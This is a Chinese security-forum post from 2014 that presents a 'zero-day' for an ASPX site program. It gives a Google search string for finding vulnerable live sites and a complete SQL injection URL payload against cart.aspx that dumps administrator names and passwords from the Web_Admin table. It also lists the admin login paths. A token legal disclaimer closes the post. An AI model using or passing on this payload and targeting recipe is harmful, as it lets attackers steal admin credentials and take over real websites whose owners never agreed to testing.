我们来自五湖四海,不为别的,只因有共同的爱好,为中国互联网发展出一分力!

零日漏洞爆密码oday高效率拿webshell

2014年03月15日04:56 阅读: 28222 次

标签: 零日漏洞爆密码oday高效率拿websh

这里公布一个关于aspx网站程序的oday方法很简单。直接爆出管理密码。

也是利用注入漏洞。

利用代码

谷歌搜索关键字:inurl:scoreindex.aspx


cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

后台地址:/weblogin/Login.aspx

后台地址/weblogin/index.aspx

这个oday出来也有一段时间了。搜索一下也有1300多个搜索结果,公布漏洞的目标不是为了让大家去搞破坏。希望大家合理利用。

————————————————————————–
免责申明:请使用者注意使用环境并遵守国家相关法律法规!
由于使用不当造成的后果本厂家不承担任何责任!
————————————————————————–

分享到: 更多
©2017 安全焦点 版权所有.
人才招聘联系我们